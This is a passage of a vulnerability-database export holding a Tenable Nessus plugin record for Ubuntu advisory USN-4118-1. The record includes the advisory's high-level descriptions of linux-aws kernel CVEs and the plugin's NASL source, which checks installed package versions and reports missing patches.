in the Linux kernel\nwhen performing core dumps. A local attacker could use this to cause a\ndenial of service (system crash) or expose sensitive information.\n(CVE-2019-11599)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the LSI Logic MegaRAID driver in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-11810)\n\nIt was discovered that a race condition leading to a use-after-free\nexisted in the Reliable Datagram Sockets (RDS) protocol implementation\nin the Linux kernel. The RDS protocol is blacklisted by default in\nUbuntu. If enabled, a local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2019-11815)\n\nIt was discovered that the ext4 file system implementation in the\nLinux kernel did not properly zero out memory in some situations. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-11833)\n\nIt was discovered that the Bluetooth Human Interface Device Protocol\n(HIDP) implementation in the Linux kernel did not properly verify\nstrings were NULL terminated in certain situations. A local attacker\ncould use this to expose sensitive information (kernel memory).\n(CVE-2019-11884)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the GTCO tablet input driver in the Linux\nkernel did not properly bounds check the initial HID report sent by\nthe device. A physically proximate attacker could use to cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-13631)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A\nlocal attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-14284)\n\nTuba Yavuz discovered that a race condition existed in the DesignWare\nUSB3 DRD Controller device driver in the Linux kernel. A physically\nproximate attacker could use this to cause a denial of service.\n(CVE-2019-14763)\n\nIt was discovered that an out-of-bounds read existed in the QLogic\nQEDI iSCSI Initiator Driver in the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information (kernel\nmemory). (CVE-2019-15090)\n\nIt was discovered that the Raremono AM/FM/SW radio device driver in\nthe Linux kernel did not properly allocate memory, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service or possibly execute arbitrary code.\n(CVE-2019-15211)\n\nIt was discovered at a double-free error existed in the USB Rio 500\ndevice driver for the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service. (CVE-2019-15212)\n\nIt was discovered that a race condition existed in the Advanced Linux\nSound Architecture (ALSA) subsystem of the Linux kernel, leading to a\npotential use-after-free. A physically proximate attacker could use\nthis to cause a denial of service (system crash) pro possibly execute\narbitrary code. (CVE-2019-15214)\n\nIt was discovered that a race condition existed in the CPiA2\nvideo4linux device driver for the Linux kernel, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-15215)\n\nIt was discovered that a race condition existed in the Softmac USB\nPrism54 device driver in the Linux kernel. A physically proximate\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-15220)\n\nIt was discovered that a use-after-free vulnerability existed in the\nAppletalk implementation in the Linux kernel if an error occurs during\ninitialization. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15292)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out of bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in\nthe virtio net driver in the Linux kernel. A local attacker in a guest\nVM could possibly use this to cause a denial of service in the host\nsystem. (CVE-2019-3900)\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper B. Rasmussen\ndiscovered that the Bluetooth protocol BR/EDR specification did not\nproperly require sufficiently strong encryption key lengths. A\nphysicall proximate attacker could use this to expose sensitive\ninformation. (CVE-2019-9506)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511)\n\nIt was discovered that a race condition existed in the USB YUREX\ndevice driver in the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2019-15216)\n\nIt was discovered that the Siano USB MDTV receiver device driver in\nthe Linux kernel made improper assumptions about the device\ncharacteristics. A physically proximate attacker could use this cause\na denial of service (system crash). (CVE-2019-15218)\n\nIt was discovered that the Line 6 POD USB device driver in the Linux\nkernel did not properly validate data size information from the\ndevice. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-15221)\n\nMuyu Yu discovered that the CAN implementation in the Linux kernel in\nsome situations did not properly restrict the field size when\nprocessing outgoing frames. A local attacker with CAP_NET_ADMIN\nprivileges could use this to execute arbitrary code. (CVE-2019-3701)\n\nVladis Dronov discovered that the debug interface for the Linux\nkernel's HID subsystem did not properly validate passed parameters in\nsome situations. A local privileged attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2019-3819).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-03T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS : linux-aws vulnerabilities (USN-4118-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14609", "CVE-2019-14763", "CVE-2019-15218", "CVE-2018-13053", "CVE-2019-15090", "CVE-2019-3900", "CVE-2018-14610", "CVE-2018-13096", "CVE-2019-0136", "CVE-2018-13098", "CVE-2019-14284", "CVE-2019-12984", "CVE-2019-10639", "CVE-2018-20784", "CVE-2019-15216", "CVE-2018-13100", "CVE-2019-15211", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2019-11085", "CVE-2018-13099", "CVE-2019-13272", "CVE-2019-9506", "CVE-2019-15215", "CVE-2019-13631", "CVE-2018-16862", "CVE-2019-11884", "CVE-2019-10207", "CVE-2019-15220", "CVE-2019-11810", "CVE-2019-11833", "CVE-2019-15212", "CVE-2019-11599", "CVE-2019-15221", "CVE-2018-14614", "CVE-2019-10638", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2019-3701", "CVE-2019-15292", "CVE-2019-11487", "CVE-2018-14612", "CVE-2019-2024", "CVE-2019-11815", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-15214", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-3819", "CVE-2018-19985", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613", "CVE-2019-14283"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-aws", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-hwe", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws"], "id": "UBUNTU_USN-4118-1.NASL", "href": "https://www.tenable.com/plugins/nessus/128478", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4118-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128478);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/24 11:30:51\");\n\n script_cve_id(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-19985\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20784\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-0136\", \"CVE-2019-10126\", \"CVE-2019-10207\", \"CVE-2019-10638\", \"CVE-2019-10639\", \"CVE-2019-11085\", \"CVE-2019-11487\", \"CVE-2019-11599\", \"CVE-2019-11810\", \"CVE-2019-11815\", \"CVE-2019-11833\", \"CVE-2019-11884\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-13631\", \"CVE-2019-14283\", \"CVE-2019-14284\", \"CVE-2019-14763\", \"CVE-2019-15090\", \"CVE-2019-15211\", \"CVE-2019-15212\", \"CVE-2019-15214\", \"CVE-2019-15215\", \"CVE-2019-15216\", \"CVE-2019-15218\", \"CVE-2019-15220\", \"CVE-2019-15221\", \"CVE-2019-15292\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3701\", \"CVE-2019-3819\", \"CVE-2019-3846\", \"CVE-2019-3900\", \"CVE-2019-9506\");\n script_xref(name:\"USN\", value:\"4118-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : linux-aws vulnerabilities (USN-4118-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13096,\nCVE-2018-13097, CVE-2018-13098, CVE-2018-13099, CVE-2018-13100,\nCVE-2018-14614, CVE-2018-14615, CVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14609, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612,\nCVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed\ndriver in the Linux kernel did not properly validate metadata received\nfrom the device. A physically proximate attacker could use this to\ncause a denial of service (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could triggered in the\nCFS Linux kernel process scheduler. A local attacker could possibly\nuse this to cause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. (CVE-2018-5383)\n\nIt was discovered that the Intel wifi device driver in the Linux\nkernel did not properly validate certain Tunneled Direct Link Setup\n(TDLS). A physically proximate attacker could use this to cause a\ndenial of service (wifi disconnect). (CVE-2019-0136)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local\nattacker could use this to cause a denial of service. (CVE-2019-10207)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not\nsufficiently randomize IP ID values generated for connectionless\nnetworking protocols. A remote attacker could use this to track\nparticular Linux devices. (CVE-2019-10638)\n\nAmit Klein and Benny Pinkas discovered that the location of kernel\naddresses could exposed by the implementation of connection-less\nnetwork protocols in the Linux kernel. A remote attacker could\npossibly use this to assist in the exploitation of another\nvulnerability in the Linux kernel. (CVE-2019-10639)\n\nAdam Zabrocki discovered that the Intel i915 kernel mode graphics\ndriver in the Linux kernel did not properly restrict mmap() ranges in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2019-11085)\n\nIt was discovered that an integer overflow existed in the Linux kernel\nwhen reference counting pages, leading to potential use-after-free\nissues. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-11487)\n\nJann Horn discovered that a race condition existed in the Linux kernel\nwhen performing core dumps. A local attacker could use this to cause a\ndenial of service (system crash) or expose sensitive information.\n(CVE-2019-11599)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the LSI Logic MegaRAID driver in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-11810)\n\nIt was discovered that a race condition leading to a use-after-free\nexisted in the Reliable Datagram Sockets (RDS) protocol implementation\nin the Linux kernel. The RDS protocol is blacklisted by default in\nUbuntu. If enabled, a local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2019-11815)\n\nIt was discovered that the ext4 file system implementation in the\nLinux kernel did not properly zero out memory in some situations. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-11833)\n\nIt was discovered that the Bluetooth Human Interface Device Protocol\n(HIDP) implementation in the Linux kernel did not properly verify\nstrings were NULL terminated in certain situations. A local attacker\ncould use this to expose sensitive information (kernel memory).\n(CVE-2019-11884)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the GTCO tablet input driver in the Linux\nkernel did not properly bounds check the initial HID report sent by\nthe device. A physically proximate attacker could use to cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-13631)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A\nlocal attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-14284)\n\nTuba Yavuz discovered that a race condition existed in the DesignWare\nUSB3 DRD Controller device driver in the Linux kernel. A physically\nproximate attacker could use this to cause a denial of service.\n(CVE-2019-14763)\n\nIt was discovered that an out-of-bounds read existed in the QLogic\nQEDI iSCSI Initiator Driver in the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information (kernel\nmemory). (CVE-2019-15090)\n\nIt was discovered that the Raremono AM/FM/SW radio device driver in\nthe Linux kernel did not properly allocate memory, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service or possibly execute arbitrary code.\n(CVE-2019-15211)\n\nIt was discovered at a double-free error existed in the USB Rio 500\ndevice driver for the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service. (CVE-2019-15212)\n\nIt was discovered that a race condition existed in the Advanced Linux\nSound Architecture (ALSA) subsystem of the Linux kernel, leading to a\npotential use-after-free. A physically proximate attacker could use\nthis to cause a denial of service (system crash) pro possibly execute\narbitrary code. (CVE-2019-15214)\n\nIt was discovered that a race condition existed in the CPiA2\nvideo4linux device driver for the Linux kernel, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-15215)\n\nIt was discovered that a race condition existed in the Softmac USB\nPrism54 device driver in the Linux kernel. A physically proximate\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-15220)\n\nIt was discovered that a use-after-free vulnerability existed in the\nAppletalk implementation in the Linux kernel if an error occurs during\ninitialization. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15292)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out of bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in\nthe virtio net driver in the Linux kernel. A local attacker in a guest\nVM could possibly use this to cause a denial of service in the host\nsystem. (CVE-2019-3900)\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper B. Rasmussen\ndiscovered that the Bluetooth protocol BR/EDR specification did not\nproperly require sufficiently strong encryption key lengths. A\nphysicall proximate attacker could use this to expose sensitive\ninformation. (CVE-2019-9506)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511)\n\nIt was discovered that a race condition existed in the USB YUREX\ndevice driver in the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2019-15216)\n\nIt was discovered that the Siano USB MDTV receiver device driver in\nthe Linux kernel made improper assumptions about the device\ncharacteristics. A physically proximate attacker could use this cause\na denial of service (system crash). (CVE-2019-15218)\n\nIt was discovered that the Line 6 POD USB device driver in the Linux\nkernel did not properly validate data size information from the\ndevice. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-15221)\n\nMuyu Yu discovered that the CAN implementation in the Linux kernel in\nsome situations did not properly restrict the field size when\nprocessing outgoing frames. A local attacker with CAP_NET_ADMIN\nprivileges could use this to execute arbitrary code. (CVE-2019-3701)\n\nVladis Dronov discovered that the debug interface for the Linux\nkernel's HID subsystem did not properly validate passed parameters in\nsome situations. A local privileged attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2019-3819).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4118-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.15-aws, linux-image-aws and / or\nlinux-image-aws-hwe packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-hwe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019 Canonical, Inc. / NASL script (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-19985\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20784\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-0136\", \"CVE-2019-10126\", \"CVE-2019-10207\", \"CVE-2019-10638\", \"CVE-2019-10639\", \"CVE-2019-11085\", \"CVE-2019-11487\", \"CVE-2019-11599\", \"CVE-2019-11810\", \"CVE-2019-11815\", \"CVE-2019-11833\", \"CVE-2019-11884\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-13631\", \"CVE-2019-14283\", \"CVE-2019-14284\", \"CVE-2019-14763\", \"CVE-2019-15090\", \"CVE-2019-15211\", \"CVE-2019-15212\", \"CVE-2019-15214\", \"CVE-2019-15215\", \"CVE-2019-15216\", \"CVE-2019-15218\", \"CVE-2019-15220\", \"CVE-2019-15221\", \"CVE-2019-15292\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3701\", \"CVE-2019-3819\", \"CVE-2019-3846\", \"CVE-2019-3900\", \"CVE-2019-9506\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-4118-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1047-aws\", pkgver:\"4.15.0-1047.49~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws-hwe\", pkgver:\"4.15.0.1047.47\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1047-aws\", pkgver:\"4.15.0-1047.49\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-aws\", pkgver:\"4.15.0.1047.46\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-aws / linux-image-aws / linux-image-aws-hwe\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T11:00:29", "description": "It was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13097,\nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616,\nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613,\nCVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the 